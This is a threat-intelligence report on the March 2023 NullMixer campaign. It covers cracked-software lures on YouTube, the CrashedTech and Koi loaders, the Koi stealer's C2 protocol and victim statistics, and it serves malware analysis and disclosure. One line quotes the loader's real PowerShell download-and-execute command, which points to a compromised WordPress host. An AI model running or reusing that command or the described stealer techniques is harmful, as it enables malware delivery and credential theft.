Pierluigi Paganini
March 27, 2023
Executive Summary
Introduction
During March 2023, we obtained information and data regarding an ongoing malware operation hitting more than 8.000 targets within a few weeks, with a particular emphasis on North American, Italian, and French targets.
Such was related to a worldwide malware operation known as NullMixer, a controversial and widespread malware delivery maneuver based on SEO poisoning and social engineering technique to lure tech-savvy users, including IT personnel.
The insight from this attack wave revealed the presence of a controversial piece of code in the delivered payloads, among additional loaders related to new MaaS and PPI operators.
Technical Analysis
There are two main key areas we technically analyzed during this investigation: first of all the presence of two unknown loaders entering the MaaS and PPI businesses (CrashedLoader and Koi), along with the presence of a controversial, potentially North-Korean linked piece of malware, and secondly, we analyzed data about current successful infection rates on targeted hosts.
The Originating Malvertising Campaign
According to CTI investigation on the adversary infrastructure, we were able to identify an ongoing campaign luring system administrators to install the malicious code into their machines. In particular, the identified attack wave was designed to trick users to install backdoored, cracked versions of notorious PC maintenance software such as “EaseUS Partition Master” and “Driver Easy Pro”, two well-known tools within the IT community.
Filename: Driver Easy Pro Crack.exe
MD5: 324db70fad161852fb9a12b202b6c8ad
Investigations end up in a series of Youtube videos promoting cracks for such programs. One of them presented a masked, hooded male hacker explaining how to use the crack linked in the video description. The threat actor abused Bitly shortener and an ad hoc BlogSpot account to protect the malicious code, lastly stored in an encrypted zip archive hosted on Mega.nz.
This particular modus operandi matches a particular threat Kaspersky researchers spotted in September 2022 (link): NullMixer. NullMixer is a worldwide spread criminal operation designed to provide infection services to an oodle of criminal threat actors. In fact, its operators packed a multitude of malware into a single vector and then abused social engineering, SEO poisoning, and malvertising techniques to lure their victims into running their payloads.
NullMixer is maintaining the same lure topic since September 2022, advertising fake software pirate cracks targeting tech-savvy users and potentially even IT personnel and freelancers.
During their March 2023 infection wave, they evolved their social engineering techniques by producing the above-mentioned YouTube videos containing instructions to download and run the backdoored pirate software.
Despite that evolution, NullMixer’s initial payload remains substantially the same: a WinRAR executable archive containing multiple binaries configured to be auto-launched on click. All at the same time.
This plethora of malicious code related to different threat actors gives us the chance to better understand the evolutions in the cybercriminal underground. In fact, aside from the well-known off-the-shelf info stealer we also observed the presence of more peculiar pieces of code, including other unconventional malware loader services.
The following subsections will highlight some of the above-mentioned samples, especially the loader ones to aim for a better understanding of the current MaaS landscape.
The CrashedTech Loader
The “KiffAppE2.exe” file is worth mentioning because it works as a secondary loader. This loader appeared in the security community in November 2022 thanks to @fr3dhk, which gave it its current name “CrashedTech Loader” and its panel has already been added to the “What Is This C2” collection (link).
Filename: KiffAppE2.exe
Hash: 53f9c2f2f1a755fc04130fd5e9fcaff4
The “KiffAppE2.exe” file is a .NET binary masking the loader code in plain sight, basically, it launches the loader code before showing the application form. It also checks a particular registry key “KiffAppApi” under the HKCU hive to make sure the victim has not been already infected, reasonably this would likely hurt the actor PPI model.
The loader code is pretty straightforward its main logic consists of two steps. First, it does a check-in providing user-name, os version, and public IP information to the “/addnew.php” endpoint on the C2, then it parses the server response to extract the location where to download further payloads. After this, it downloads the payload and executes it through the “Process.Start” .NET API.
During March 2023, this particular loader was dropping at least two distinct RedLine Stealer payloads configured to connect back to C2 servers hosted by the Ukrainian hosting provider Timehost.
The “Koi” Stealer/Loader
Another interesting piece of malware embedded in the NullMixer campaign we reference as ATK-16 is the “sqlcmd.exe” binary, a 32bit MSVC binary.
Filename: sqlcmd.exe
Hash: 6ffbbca108cfe838ca7138e381df210d
At a high level, the main routine of this loader does two things: insistently tries to download multiple executable files with the name pattern “ab[NUMBER].php” and “ab[NUMBER].exe” from a statically configured location, and runs an additional inline PowerShell command to download and execute more code.
“C:\WINDOWS\sysnative\cmd.exe” /c “powershell -command IEX(New-Object Net.Webclient).DownloadString(‘https://neutropharma .com/wp/wp-content/debug2.ps1’)”
This particular sample of the loader downloads the PowerShell script from a Pakistani compromised WordPress site. The typical names we observed to be downloaded are “debug2.ps1”, “debug20.ps1”, “debug4.ps1” and so on. The downloaded script contains a long chunk of bytes and a sort of decryption routine base on a textbook-looking xor operation, after that, the resulting bytes are loaded as a .NET assembly module.
The key to decrypting the embedded code is served through an external check-in service, implementing a multi-stage polymorphic protection scheme. Such initial C2 service also provides additional malware configuration including campaign Id and additional command and control locations.
During March 2023, the resulting binary is a .NET file packed with ConfuseEx v1.0.0. Once decoded, the malicious payload results in a .NET module named “koi” and implements information stealer functionalities such as password stealing from FileZilla, Chrome browser, and Discord, crypto-wallets stealing, Telegram folder exfiltration, Vpn configurations, and it also looks for the presence of hardware wallet like Trezor, probably to identify high-value targets for cryptocurrency theft. The module also exfiltrates 2FA secrets from Twilio’s Authy local storage.
Filename: “koi” (dumped)
Hash: 9725ec075e92e25ea5b6e99c35c7aa74
Before starting all these collection operations, the “koi” module invokes the “checkVal” function to avoid unwanted targets. In particular, it uses mutex “99759703-b8b4–4cb2–8329–76f908b004f0” to avoid re-infection and also checks for the presence of video controller of the Wine emulation framework, along with common user names and computer names used by sandboxes or by AV emulation routines.
The module also avoids the execution of the malicious stealer routines if the system language is set to one of the values representing the CIS countries:
After that, the “koi” module starts gathering information about system installed software and sets up a communication channel with the command and control service received as a startup parameter, in this case, the Latvian IP address 195.123.211,56.
This malware communicates with its command and control in a curious manner: it redirects certain memory streams directly to the remote server, this way, malware authors were able to avoid touching the disk even to lay temporary data before exfiltration. The first message sent to the C2 starts with the “CONFIG|” keyword and contains check-in information among with the campaign Id passed to the module via its PowerShell loader. Then, C2 triages the infected host and responds in two possible ways: if “D” is returned, the “koi” module stops its operations, otherwise, the command would contain additional commands and the malicious code starts gathering even more data from the infected host.
In detail, a valid response from the C2 server would look like this:
LDR “|” (DO|AND|OR) “|” (On|Off) “|” ( list “,” list “,” .. ) “|” url “|” suffix
Here the C2 server asks the bot to download and execute an additional payload from the remote location specified as “url”.
All these communications happen in plain HTTP, but despite that, messages are not easy to spot because the “koi” module encrypts messages using a custom protocol based on ECC encryption.
In fact, the C2 communication leverages custom implementation ECC with Curve25519 to generate a shared secret key that would be used to encrypt the otherwise plain HTTP body. In particular, the communication protection scheme of this piece of malware works as follows:
To make all this work, the final message sent to the C2 server will also need to contain the bot “public-key” and here a detection opportunity emerges: the HTTP body of the generated request is created concatenating 32 bytes of the randomly generated bot “public-key”, a static separator “K”, and then the encrypted stream.
Attack Wave Insights
Based on the analysis of the C2 infrastructures involved in this NullMixer wave (ATK-16), we obtained insights about successfully infected hosts. In particular, we were able to obtain evidence of the successful execution of at least one of the payloads within the target machines.
The NullMixer operations we dissected (ATK-16) count victims in at least 87 countries. With an average infraction rate of 297 new victims per day, the malicious actors behind hit over 8 thousand in less than 30 days. Peaks of operations show an intensification of the activities starting from the 28th of February 2023 when the infection rate jumped sensibly higher.
Impacted Countries
During the March spike period, the malicious operators significantly expanded their campaign among countries outside North America: this wave hit many European countries including Italy (4.57%, in fourth position) and France (3.38%, in sixth position).
Starting from the infected hosts’ data available, the infection progression shows the clear horizontal expansion of the attacked surface corresponding to the above-mentioned peak on the 28th of February.
Target Profile
As we expected the majority of the targeted hosts mount Microsoft client operations systems: 56.8 % Windows 10 Pro and 25.35 % Windows 10 Home, indicating major of the targets are micro or small businesses or private users. Despite that, we noticed interesting outliers, 5.3 % of the victims mount the Enterprise version of the Microsoft OS, and almost 71 hosts also mount the Windows Server version of the Microsoft operating system.
The majority of the data extracted from the victims will likely reach the underground dark markets soon, but for this latest portion of infected hosts the risk is even higher: the operator will likely try to sell access to these servers and enterprise machines to even more dangerous thirds parties, including well-known ransomware operators.
In the end, we also noticed that five machines that got infected were running even a rarer version of the Microsoft operating system: Windows Embedded, an indication that even Windows-based IoT devices have been hit by this campaign.
Conclusions
After 9 months, the NullMixer operation evolved leveraging malicious video tutorials increasing its penetration on tech-savvy users and revealing new potential players in the MaaS ecosystems.
The data we accessed during this investigation lighted up the impacted victims of their latest campaign, revealing Italy as the first European target hit by the March 2023 infection wave. During the recent period, Italy has been heavily targeted by cyber attacks, especially from young collectives of cyber-partisans supporting the Kremlin’s propaganda such as Killnet and NoName057. Such criminals base their operations on volunteer and micro-criminal labor forces typically among the eastern CIS countries, for this reason, a spike observing such penetration against Italian hosts becomes particularly interesting, especially with the current geopolitical and cyber temperature against the Italian peninsula.
Technical details of the victims, adversary infrastructure, and indicators of compromise have been shared with local authorities and the national CSIRT.
If you want to have Indicators of Compromise and Yara Rules for this threat give a look at the original post published on Medium:
https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1
About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager
In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”. He is a former member of the ANeSeC CTF team, one of the firsts Italian cyber wargame teams born back in 2011.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, NullMixer malware)
